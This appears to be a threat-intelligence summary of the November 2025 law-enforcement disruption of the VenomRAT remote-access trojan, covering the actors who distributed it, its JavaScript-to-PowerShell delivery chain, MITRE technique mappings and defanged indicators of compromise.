VenomRAT, a Quasar RAT derivative used by multiple cybercriminal actors—most notably TA558—was disrupted by U.S. and international law enforcement on 13 November 2025, with the seizure of distribution and licensing domains and the arrest of the suspected creator in Greece. Proofpoint observed rising VenomRAT usage in email campaigns through mid-2024–2025, and following the takedown actors like TA558 have pivoted to other RATs such as Remcos and XWorm. #VenomRAT #TA558
Keypoints
- VenomRAT is a commodity RAT based on the open-source Quasar RAT and has been observed in Proofpoint data since 2022.
- On 13 November 2025, international law enforcement disrupted VenomRAT infrastructure (remotesystem[.]in, venomlicense[.]com) and arrested the suspected creator in Greece as part of Operation Endgame.
- TA558 is the most prominent distributor of VenomRAT, accounting for 58% of VenomRAT activity in Proofpoint email campaign data since 2022 and targeting Portuguese- and Spanish-speaking victims.
- Typical campaigns use lures in Portuguese, Spanish, or English with URLs to JavaScript files that spawn PowerShell to download and run VenomRAT; TA2541 and multiple unattributed clusters also used similar delivery chains.
- VenomRAT enables information gathering, exfiltration, lateral movement, and delivery of follow-on payloads; some variants include ransomware functionality.
- Proofpoint has not observed VenomRAT in campaigns since September 2025; disrupted actors have pivoted to other payloads like Remcos RAT and XWorm, and activity volumes have declined.
- Operation Endgame disruptions have materially reduced email-delivered malware activity tied to targeted families and influenced threat actor behavior beyond technical impacts.
MITRE Techniques
- [T1059] Command and Scripting Interpreter – VenomRAT campaigns used JavaScript files that, when executed, “spawned PowerShell to download and run VenomRAT.” (“…the file spawned PowerShell to download and run VenomRAT…”)
- [T1105] Ingress Tool Transfer – Attack chain downloads VenomRAT via URLs linked from email lures (“…messages contained URLs leading to a JavaScript file. If executed, the file spawned PowerShell to download and run VenomRAT.”)
- [T1041] Exfiltration Over C2 Channel – VenomRAT is used for information gathering and exfiltration (“VenomRAT can be used for information gathering, exfiltration, lateral movement, and to download follow-on payloads.”)
- [T1021] Remote Services (Lateral Movement) – VenomRAT facilitates lateral movement within compromised environments (“VenomRAT can be used for information gathering, exfiltration, lateral movement…”)
- [T1490] Inhibit System Recovery / [T1486] Data Encrypted for Impact (ransomware) – Some VenomRAT variants contain ransomware functionality (translated quote: “…Some VenomRAT variants contain ransomware functionality.”)
Indicators of Compromise
- [Domain] Distribution and licensing domains seized – remotesystem[.]in, venomlicense[.]com
- [File/Artifact] Delivery chain artifacts – JavaScript files that spawn PowerShell to download VenomRAT (example: JS downloader URLs observed in TA558 campaigns)
- [Threat Actor] Actor identifiers and targeting context – TA558 (targets Portuguese/Spanish speakers, Latin America/Western Europe/North America), TA2541 (impersonates aviation firms)
- [Temporal] Campaign timing context – VenomRAT observed in Proofpoint email campaigns through September 2025; disruption announced 13 November 2025
Read more: https://www.proofpoint.com/us/blog/threat-insight/security-brief-venomrat-defanged